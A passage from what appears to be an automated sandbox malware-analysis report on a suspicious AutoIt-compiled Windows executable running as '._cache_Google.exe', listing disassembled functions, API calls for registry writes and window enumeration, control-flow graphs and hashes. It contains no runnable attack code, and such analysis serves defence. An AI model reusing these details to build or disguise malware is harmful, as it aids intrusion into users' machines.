                                                                                                                                                                              • Opcode Fuzzy Hash: 1a82436a7fae32e55f0d9cfa7180547253cc792bee01f73fc5a6f6b21dcce545
                                                                                                                                                                              • Instruction Fuzzy Hash: E3621170504340DFDB24DF25D885BEA7BE4BF85308F04496EF94A8B292DB78D848DB66
                                                                                                                                                                              Function 004E6A28 Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ___createFile.LIBCMT ref: 004E6C73
                                                                                                                                                                              • ___createFile.LIBCMT ref: 004E6CB4
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004E6CDD
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004E6CE4
                                                                                                                                                                              • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004E6CF7
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004E6D1A
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004E6D23
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004E6D2C
                                                                                                                                                                              • __set_osfhnd.LIBCMT ref: 004E6D5C
                                                                                                                                                                              • __lseeki64_nolock.LIBCMT ref: 004E6DC6
                                                                                                                                                                              • __close_nolock.LIBCMT ref: 004E6DEC
                                                                                                                                                                              • __chsize_nolock.LIBCMT ref: 004E6E1C
                                                                                                                                                                              • __lseeki64_nolock.LIBCMT ref: 004E6E2E
                                                                                                                                                                              • __lseeki64_nolock.LIBCMT ref: 004E6F26
                                                                                                                                                                              • __lseeki64_nolock.LIBCMT ref: 004E6F3B
                                                                                                                                                                              • __close_nolock.LIBCMT ref: 004E6F9B
                                                                                                                                                                                • Part of subcall function 004DF84C: CloseHandle.KERNEL32(00000000,0055EEC4,00000000,?,004E6DF1,0055EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004DF89C
                                                                                                                                                                                • Part of subcall function 004DF84C: GetLastError.KERNEL32(?,004E6DF1,0055EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004DF8A6
                                                                                                                                                                                • Part of subcall function 004DF84C: __free_osfhnd.LIBCMT ref: 004DF8B3
                                                                                                                                                                                • Part of subcall function 004DF84C: __dosmaperr.LIBCMT ref: 004DF8D5
                                                                                                                                                                                • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                                                                                                                                              • __lseeki64_nolock.LIBCMT ref: 004E6FBD
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004E70F2
                                                                                                                                                                              • ___createFile.LIBCMT ref: 004E7111
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004E711E
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004E7125
                                                                                                                                                                              • __free_osfhnd.LIBCMT ref: 004E7145
                                                                                                                                                                              • __invoke_watson.LIBCMT ref: 004E7173
                                                                                                                                                                              • __wsopen_helper.LIBCMT ref: 004E718D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                                                              • String ID: 9AM$@
                                                                                                                                                                              • API String ID: 3896587723-3066932247
                                                                                                                                                                              • Opcode ID: fe0bc26f134c7fec5e4b9162a812793511b50cbc40663f6fa49a1f53d35db8f7
                                                                                                                                                                              • Instruction ID: fb0d25ed0290265abbe0b3dcbdf6d7870792e50cfe61dd5b9051275790d96148
                                                                                                                                                                              • Opcode Fuzzy Hash: fe0bc26f134c7fec5e4b9162a812793511b50cbc40663f6fa49a1f53d35db8f7
                                                                                                                                                                              • Instruction Fuzzy Hash: 06225231D002859FEB249E6ADC91BBF7B60EB203A5F25422BE521AB3D1C73D8D40D759
                                                                                                                                                                              Function 004F76DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 004F76ED
                                                                                                                                                                              • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 004F7713
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 004F7741
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004F774C
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F7762
                                                                                                                                                                              • _wcsstr.LIBCMT ref: 004F776D
                                                                                                                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 004F7789
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F77D2
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F77D9
                                                                                                                                                                              • _wcsncpy.LIBCMT ref: 004F7804
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                              • API String ID: 699586101-1459072770
                                                                                                                                                                              • Opcode ID: b8ee5d85debfd2ab246a765d05a0e9f4bd68c1538f965641dcc3455fc4de4998
                                                                                                                                                                              • Instruction ID: a2ab51df16d3e03b6744706ef45819f623d03e974bcb0b0292c5c7290f302ba0
                                                                                                                                                                              • Opcode Fuzzy Hash: b8ee5d85debfd2ab246a765d05a0e9f4bd68c1538f965641dcc3455fc4de4998
                                                                                                                                                                              • Instruction Fuzzy Hash: 35411771904204BAD701B7659C97EBF7BFCEF55754F00005BF900A3292EB6CAA01D6B9
                                                                                                                                                                              Function 004B1F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 608 4b1f04-4b1f9c call 4b2d1a * 2 call 4bc935 * 2 call 4b7e53 call 4bd3d2 * 3 625 4b1fa2-4b1fa6 608->625 626 522569-522575 call 4d2626 608->626 628 4b1fac-4b1faf 625->628 629 52257d-522583 call 4ee4ea 625->629 626->629 630 52258f-52259b call 4ba4f6 628->630 631 4b1fb5-4b1fb8 628->631 629->630 640 5225a1-5225b1 call 4ba4f6 630->640 641 522899-52289d 630->641 631->630 634 4b1fbe-4b1fc7 GetForegroundWindow call 4b200a 631->634 639 4b1fcc-4b1fe3 call 4b197e 634->639 651 4b1fe4-4b2007 call 4b5cd3 * 3 639->651 640->641 654 5225b7-5225c5 640->654 643 5228ab-5228ae 641->643 644 52289f-5228a6 call 4bc935 641->644 648 5228b0 643->648 649 5228b7-5228c4 643->649 644->643 648->649 652 5228d6-5228da 649->652 653 5228c6-5228d4 call 4bb8a7 CharUpperBuffW 649->653 658 5228f1-5228fa 652->658 659 5228dc-5228df 652->659 653->652 657 5225c9-5225e1 call 4ed68d 654->657 657->641 673 5225e7-5225f7 call 4cf885 657->673 661 52290b EnumWindows 658->661 662 5228fc-522909 GetDesktopWindow EnumChildWindows 658->662 659->658 660 5228e1-5228ef call 4bb8a7 CharUpperBuffW 659->660 660->658 667 522911-522930 call 4ee44e call 4b2d1a 661->667 662->667 685 522932-52293b call 4b200a 667->685 686 522940 667->686 680 52287b-52288b call 4cf885 673->680 681 5225fd-52260d call 4cf885 673->681 690 522873-522876 680->690 691 52288d-522891 680->691 692 522613-522623 call 4cf885 681->692 693 522861-522871 call 4cf885 681->693 685->686 691->651 694 522897 691->694 700 522629-522639 call 4cf885 692->700 701 52281d-522836 call 4f88a2 IsWindow 692->701 693->690 702 522842-522848 GetForegroundWindow 693->702 697 522852-522858 694->697 697->693 711 52263b-522640 700->711 712 522659-522669 call 4cf885 700->712 701->651 709 52283c-522840 701->709 704 522849-522850 call 4b200a 702->704 704->697 709->704 714 522646-522657 call 4b5cf6 711->714 715 52280d-52280f 711->715 719 52267a-52268a call 4cf885 712->719 720 52266b-522675 712->720 724 52269b-5226a7 call 4b5be9 714->724 718 522817-522818 715->718 718->651 728 5226b5-5226c5 call 4cf885 719->728 729 52268c-522698 call 4b5cf6 719->729 722 5227e6-5227f0 call 4bc935 720->722 733 522804-522808 722->733 734 522811-522813 724->734 735 5226ad-5226b0 724->735 739 5226e3-5226f3 call 4cf885 728->739 740 5226c7-5226de call 4d2241 728->740 729->724 733->657 734->718 735->733 745 522711-522721 call 4cf885 739->745 746 5226f5-52270c call 4d2241 739->746 740->733 751 522723-52273a call 4d2241 745->751 752 52273f-52274f call 4cf885 745->752 746->733 751->733 757 522751-522768 call 4d2241 752->757 758 52276d-52277d call 4cf885 752->758 757->733 763 522795-5227a5 call 4cf885 758->763 764 52277f-522793 call 4d2241 758->764 769 5227c3-5227d3 call 4cf885 763->769 770 5227a7-5227b7 call 4cf885 763->770 764->733 776 5227f2-522802 call 4ed614 769->776 777 5227d5-5227da 769->777 770->690 775 5227bd-5227c1 770->775 775->733 776->690 776->733 778 522815 777->778 779 5227dc-5227e2 777->779 778->718 779->722
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 004B1FBE
                                                                                                                                                                              • IsWindow.USER32(?), ref: 0052282E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Foreground_memmove
                                                                                                                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                                                              • API String ID: 3828923867-1919597938
                                                                                                                                                                              • Opcode ID: 4022d7bb4eedcec83aba75656e7aa9e4b7797e604107f27938491b63c56d8ab1
                                                                                                                                                                              • Instruction ID: 269ebd1c1fae1ef50743c9bd3f7328f184a7ba1db6185a31f3e572afaf27b7f1
                                                                                                                                                                              • Opcode Fuzzy Hash: 4022d7bb4eedcec83aba75656e7aa9e4b7797e604107f27938491b63c56d8ab1
                                                                                                                                                                              • Instruction Fuzzy Hash: A5D10534104702EBCB04EF21D491AAABFB1FF55348F444A2EF456571E1CB34E95ACBA2
                                                                                                                                                                              Function 0051352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 782 51352a-513569 call 4bd3d2 * 3 789 513574-5135e7 call 4b84a6 call 513d7b call 513af7 782->789 790 51356b-51356e 782->790 804 513612-513617 789->804 805 5135e9-5135f4 call 4fd7e4 789->805 790->789 791 5135f9-51360d call 4c2570 790->791 798 513a94-513ab7 call 4b5cd3 * 3 791->798 808 513619-51362e RegConnectRegistryW 804->808 809 51366d 804->809 805->791 812 513630-513662 call 4b7ba9 call 4fd7e4 call 4c2570 808->812 813 513667-51366b 808->813 811 513671-51369c RegCreateKeyExW 809->811 815 5136e7-5136ec 811->815 816 51369e-5136d2 call 4b7ba9 call 4fd7e4 call 4c2570 811->816 812->798 813->811 820 5136f2-513715 call 4b84a6 call 4d1bc7 815->820 821 513a7b-513a8c RegCloseKey 815->821 816->798 840 5136d8-5136e2 RegCloseKey 816->840 835 513717-51376d call 4b84a6 call 4d18fb call 4b84a6 * 2 RegSetValueExW 820->835 836 513796-5137b6 call 4b84a6 call 4d1bc7 820->836 821->798 824 513a8e-513a92 RegCloseKey 821->824 824->798 835->821 861 513773-513791 call 4b7ba9 call 4c2570 835->861 847 513840-513860 call 4b84a6 call 4d1bc7 836->847 848 5137bc-513814 call 4b84a6 call 4d18fb call 4b84a6 * 2 RegSetValueExW 836->848 840->798 862 513866-5138c9 call 4b84a6 call 4d010a call 4b84a6 call 4b3b1e 847->862 863 513949-513969 call 4b84a6 call 4d1bc7 847->863 848->821 881 51381a-51383b call 4b7ba9 call 4c2570 848->881 878 513a74 861->878 898 5138e9-513918 call 4b84a6 RegSetValueExW 862->898 899 5138cb-5138d0 862->899 882 5139c6-5139e6 call 4b84a6 call 4d1bc7 863->882 883 51396b-51398b call 4bcdb4 call 4b84a6 863->883 878->821 881->821 904 513a13-513a30 call 4b84a6 call 4d1bc7 882->904 905 5139e8-513a0e call 4bd00b call 4b84a6 882->905 907 51398d-5139a1 RegSetValueExW 883->907 915 51391a-513936 call 4b7ba9 call 4c2570 898->915 916 51393d-513944 call 4d017e 898->916 902 5138d2-5138d4 899->902 903 5138d8-5138db 899->903 902->903 903->899 908 5138dd-5138df 903->908 929 513a32-513a60 call 4fbe47 call 4b84a6 call 4fbe8a 904->929 930 513a67-513a71 call 4c2570 904->930 905->907 907->821 912 5139a7-5139c1 call 4b7ba9 call 4c2570 907->912 908->898 913 5138e1-5138e5 908->913 912->878 913->898 915->916 916->821 929->930 930->878
                                                                                                                                                                              APIs
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00513626
                                                                                                                                                                              • RegCreateKeyExW.KERNEL32(?,?,00000000,0054DBF0,00000000,?,00000000,?,?), ref: 00513694
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 005136DC
                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00513765
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00513A85
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00513A92
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                              • API String ID: 536824911-966354055
                                                                                                                                                                              • Opcode ID: ccd96c98d5f6e0755f3f7eea420576bb053a60f3e24155ef8148ab38194197fd
                                                                                                                                                                              • Instruction ID: 3d6435405a48c12322428853e86fc6e7ec22dfb2df5004df2cad53beb3a0abca
                                                                                                                                                                              • Opcode Fuzzy Hash: ccd96c98d5f6e0755f3f7eea420576bb053a60f3e24155ef8148ab38194197fd
                                                                                                                                                                              • Instruction Fuzzy Hash: C2029C75200601AFDB04EF25C891E6ABBE5FF88724F04845EF88A9B361EB34ED41CB55
                                                                                                                                                                              Function 004B4257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00000104,?,00000000,00000001,00000000), ref: 004B428C
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                                • Part of subcall function 004D1BC7: __wcsicmp_l.LIBCMT ref: 004D1C50
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 004B43C0
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0052214E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Local\Temp\._cache_Google.exe$CMDLINE$CMDLINERAW
                                                                                                                                                                              • API String ID: 861526374-509745777
                                                                                                                                                                              • Opcode ID: babb5f09155c59c772fb0ea21307a9163f0cf18d7f4b620b2b508f102c59d248
                                                                                                                                                                              • Instruction ID: 47bb017c9f432d4337db13d9659dad45d83ed8d4409e47c35f9c402ef419a79b
                                                                                                                                                                              • Opcode Fuzzy Hash: babb5f09155c59c772fb0ea21307a9163f0cf18d7f4b620b2b508f102c59d248
                                                                                                                                                                              • Instruction Fuzzy Hash: 4081C272900119AACB04EBE5DC52EEF7BB8EF55318F50001FE541B7092EF686A08DB79
                                                                                                                                                                              Function 004CE975 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 170COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004CEA39
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 004CEA56
                                                                                                                                                                                • Part of subcall function 004D297D: __wsplitpath_helper.LIBCMT ref: 004D29BD
                                                                                                                                                                              • _wcsncat.LIBCMT ref: 004CEA69
                                                                                                                                                                              • __makepath.LIBCMT ref: 004CEA85
                                                                                                                                                                                • Part of subcall function 004D2BFF: __wmakepath_s.LIBCMT ref: 004D2C13
                                                                                                                                                                                • Part of subcall function 004D010A: std::exception::exception.LIBCMT ref: 004D013E
                                                                                                                                                                                • Part of subcall function 004D010A: __CxxThrowException@8.LIBCMT ref: 004D0153
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 004CEABE
                                                                                                                                                                                • Part of subcall function 004CEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,004CEADA,?,?), ref: 004CEB27
                                                                                                                                                                              • _wcscat.LIBCMT ref: 005232FC
                                                                                                                                                                              • _wcscat.LIBCMT ref: 00523334
                                                                                                                                                                              • _wcsncpy.LIBCMT ref: 00523370
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                                                                              • String ID: Include$\$"W
                                                                                                                                                                              • API String ID: 1213536620-2250962348
                                                                                                                                                                              • Opcode ID: a26aeb773d6a40a093aa616b2353b27054549328c37a6394587c3024ca3b1e64
                                                                                                                                                                              • Instruction ID: 5bab6466ce6671c34c39b5b83ffde48aff3be5f7a130da88f229b09927cb8669
                                                                                                                                                                              • Opcode Fuzzy Hash: a26aeb773d6a40a093aa616b2353b27054549328c37a6394587c3024ca3b1e64
                                                                                                                                                                              • Instruction Fuzzy Hash: 42519EB54043409BC314EF5AFC95C9AB7E8FB69304F40091FF54987261EB789688EF6A
                                                                                                                                                                              Function 004F78EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1143 4f78ee-4f7911 WSAStartup 1144 4f7917-4f7938 gethostname gethostbyname 1143->1144 1145 4f79b1-4f79bd call 4d1943 1143->1145 1144->1145 1146 4f793a-4f7941 1144->1146 1151 4f79be-4f79c1 1145->1151 1149 4f794e-4f7950 1146->1149 1150 4f7943 1146->1150 1153 4f7952-4f795f call 4d1943 1149->1153 1154 4f7961-4f79a6 call 4cfaa0 inet_ntoa call 4d3220 call 4f8553 call 4d1943 call 4d017e 1149->1154 1152 4f7945-4f794c 1150->1152 1152->1149 1152->1152 1159 4f79a9-4f79af WSACleanup 1153->1159 1154->1159 1159->1151
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                              • String ID: 0.0.0.0
                                                                                                                                                                              • API String ID: 208665112-3771769585
                                                                                                                                                                              • Opcode ID: 8b8b671db873745ea933297ff68342302cfd2a5039c84ddee787c793c5436ce2
                                                                                                                                                                              • Instruction ID: d17ccfce657fc13021b02d4c0e554cf9fabb80436972b1ec291234ddca55f07d
                                                                                                                                                                              • Opcode Fuzzy Hash: 8b8b671db873745ea933297ff68342302cfd2a5039c84ddee787c793c5436ce2
                                                                                                                                                                              • Instruction Fuzzy Hash: AD1108B1908119ABDB24AB31AC45FEA777CEB00724F0000ABF50596290EEBCDB858668
                                                                                                                                                                              Function 004B2F58 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004B2F8B
                                                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 004B2FB5
                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004B2FC6
                                                                                                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 004B2FE3
                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004B2FF3
                                                                                                                                                                              • LoadIconW.USER32(000000A9), ref: 004B3009
                                                                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004B3018
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                              • API String ID: 2914291525-1005189915
                                                                                                                                                                              • Opcode ID: b2b4b155bc7b3677dbe0a0c0e2b0ac8107976e076b1eb7a3dbf501af5b168be3
                                                                                                                                                                              • Instruction ID: 5732ac73bcce4ec07050f3c90708185e54734cc243cb693dfc17334f7716fe69
